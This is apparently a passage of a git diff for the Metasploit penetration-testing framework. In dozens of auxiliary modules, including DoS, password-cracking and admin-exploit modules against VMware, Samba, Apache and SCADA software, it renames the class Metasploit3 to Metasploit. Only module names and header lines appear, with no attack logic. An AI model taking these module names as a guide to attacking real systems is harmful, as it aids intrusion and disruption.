826dd96338..1df36a75c4 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 30de864641..967252f9e8 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 97b3bfb1e5..1d6ac8631c 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 09bd23daf3..74d8948453 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 4b15e11364..8757549492 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index e857b9eb34..8d1a32916e 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index f179f7ef4c..9ad5a1d497 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 106dbfba96..d9b7e46002 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 77e2f3a893..b0866489fc 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index dceb166244..32cb3778cf 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index f02adcbf4d..89830d7615 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 52969f35b0..3a84c340e4 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index e1137d8945..67fc862c82 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index c519ea2b43..d98495a35a 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 45980b7cbe..2c5b22a109 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index 246a7c9cb1..8d54ea1d01 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index e41d6ff806..d12c3a13ca 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 5b0053951b..d7b9e4541d 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary #Included to grab the john.pot and use some utiltiy functions include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index d63e805904..1165b35155 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 4757cbae8e..388ed4738a 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 9e6831e2f3..637aeace4e 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # # This module sends email messages via smtp diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 7eb6ab4a4b..0a63d51068 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -17,7 +17,7 @@ require 'rinda/tuplespace' require 'pathname' require 'uri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 5c047d181f..71d6efe9a2 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ff25f23634..a3032b38a0 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index f9b0933648..3c824613df 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index cef333391d..7b9393cb18 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index 11029de675..cbe34139af 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 99218cc07b..0b377b51a7 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index ae5709b7d7..98fd776452 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index da932d94c9..35e94bc890 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 4855af2930..6d1c97d3e9 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 0974305d95..a5fdeab765 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/canon_wireless_printer.rb b/modules/auxiliary/dos/http/canon_wireless_printer.rb index f13ad89ffe..41e0ac09fa 100644 --- a/modules/auxiliary/dos/http/canon_wireless_printer.rb +++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index 6f13cb2ca0..5fab922f81 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index cdc449f22d..4fb9a5e09f 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/gzip_bomb_dos.rb b/modules/auxiliary/dos/http/gzip_bomb_dos.rb index a96f05e1b4..ae0d08fdd3 100644 --- a/modules/auxiliary/dos/http/gzip_bomb_dos.rb +++ b/modules/auxiliary/dos/http/gzip_bomb_dos.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' require 'stringio' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) diff --git a/modules/auxiliary/dos/http/hashcollision_dos.rb b/modules/auxiliary/dos/http/hashcollision_dos.rb index 59d7e7370a..330dd6b1f6 100644 --- a/modules/auxiliary/dos/http/hashcollision_dos.rb +++ b/modules/auxiliary/dos/http/hashcollision_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/monkey_headers.rb b/modules/auxiliary/dos/http/monkey_headers.rb index 2f6c097029..92898bc469 100644 --- a/modules/auxiliary/dos/http/monkey_headers.rb +++ b/modules/auxiliary/dos/http/monkey_headers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index 165a9d582e..950d0dcfa4 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/http/nodejs_pipelining.rb b/modules/auxiliary/dos/http/nodejs_pipelining.rb index 9f3181a0aa..83a586a972 100644 --- a/modules/auxiliary/dos/http/nodejs_pipelining.rb +++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index cca21add81..de8126354c 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb index 92c685a1aa..10ace3da09 100644 --- a/modules/auxiliary/dos/http/rails_action_view.rb +++ b/modules/auxiliary/dos/http/rails_action_view.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb index 3fb0da5c57..07faceacea 100644 --- a/modules/auxiliary/dos/http/rails_json_float_dos.rb +++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index e90f6bec2d..cc8745d1d9 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok. diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 4329b358db..c15d483f04 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb index 8f9e60c3ff..c051db4f45 100644 --- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb index 1567e9536f..0d9161face 100644 --- a/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb +++ b/modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 4cf177b852..f36d4d08c9 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb index fbe1395df8..bbf9330a6e 100644 --- a/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_sametime_webplayer_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb index f120cc3aa2..f6783cd9b0 100644 --- a/modules/auxiliary/dos/misc/memcached.rb +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 73a64cd658..3117dfcc39 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 949a673013..e8c9713c37 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index ec88b8823a..f36531c284 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 34a5af994f..ed96a9ad14 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index a550c617b1..f41d15ec32 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/struct2' require 'rex/proto/smb' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 10cfb38841..17b0ac5634 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 76e35d1b59..390e13d801 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -17,7 +17,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/scada/igss9_dataserver.rb b/modules/auxiliary/dos/scada/igss9_dataserver.rb index a97481a1af..f8b3cdddca 100644 --- a/modules/auxiliary/dos/scada/igss9_dataserver.rb +++ b/modules/auxiliary/dos/scada/igss9_dataserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 4149967eaf..39fe1cc089 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 86fc52f7f2..2431395492 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 3ec73403ae..fdb9d07e77 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2dddf9a25f..ad1d2bce4d 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index 